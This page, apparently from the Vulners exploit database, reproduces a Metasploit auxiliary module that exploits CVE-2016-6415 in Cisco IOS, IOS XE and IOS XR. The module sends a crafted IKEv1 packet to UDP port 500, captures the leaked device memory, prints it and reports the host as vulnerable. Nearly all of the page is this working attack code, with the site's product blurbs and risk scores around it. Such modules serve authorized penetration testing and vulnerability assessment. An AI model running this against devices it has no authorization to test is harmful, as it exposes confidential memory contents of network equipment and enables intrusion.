Vulners
Lucene search
Cisco IKE Information Disclosure
🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 179 Views
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco IKE Information Disclosure',
'Description' => %q{
A vulnerability in Internet Key Exchange version 1 (IKEv1) packet
processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software
could allow an unauthenticated, remote attacker to retrieve memory
contents, which could lead to the disclosure of confidential information.
The vulnerability is due to insufficient condition checks in the part
of the code that handles IKEv1 security negotiation requests.
An attacker could exploit this vulnerability by sending a crafted IKEv1
packet to an affected device configured to accept IKEv1 security
negotiation requests. A successful exploit could allow the attacker
to retrieve memory contents, which could lead to the disclosure of
confidential information.
},
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-6415' ],
[ 'URL', 'https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110' ],
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1' ],
[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6415' ],
[ 'URL', 'https://musalbas.com/2016/08/18/equation-group-benigncertain.html' ]
],
'DisclosureDate' => '2016-09-29'
))
register_options(
[
Opt::RPORT(500),
OptPath.new('PACKETFILE',
[ true, 'The ISAKMP packet file', File.join(Msf::Config.data_directory, 'exploits', 'cve-2016-6415', 'sendpacket.raw') ])
])
end
def run_host(ip)
begin
isakmp_pkt = File.read(datastore['PACKETFILE'])
peer = "#{ip}:#{datastore['RPORT']}"
udp_sock = Rex::Socket::Udp.create(
{
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
}
)
add_socket(udp_sock)
udp_sock.sendto(isakmp_pkt, ip, datastore['RPORT'].to_i)
res = udp_sock.get(3)
return unless res && res.length > 36 # ISAKMP + 36 -> Notitication Data...
# Convert non-printable characters to periods
printable_data = res.gsub(/[^[:print:]]/, '.')
# Show abbreviated data
vprint_status("Printable info leaked:\n#{printable_data}")
chars = res.unpack('C*')
len = (chars[30].to_s(16) + chars[31].to_s(16)).hex
return if len <= 0
print_good("#{peer} - IKE response with leak")
report_vuln({
:host => ip,
:port => datastore['RPORT'],
:proto => 'udp',
:name => self.name,
:refs => self.references,
:info => "Vulnerable to Cisco IKE Information Disclosure"
})
# NETWORK may return the same packet data.
return if res.length < 2500
pkt_md5 = ::Rex::Text.md5(isakmp_pkt[isakmp_pkt.length-2500, isakmp_pkt.length])
res_md5 = ::Rex::Text.md5(res[res.length-2500, res.length])
print_warning("#{peer} - IKE response is same to payload data") if pkt_md5 == res_md5
rescue
ensure
udp_sock.close
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5
EPSS0.92676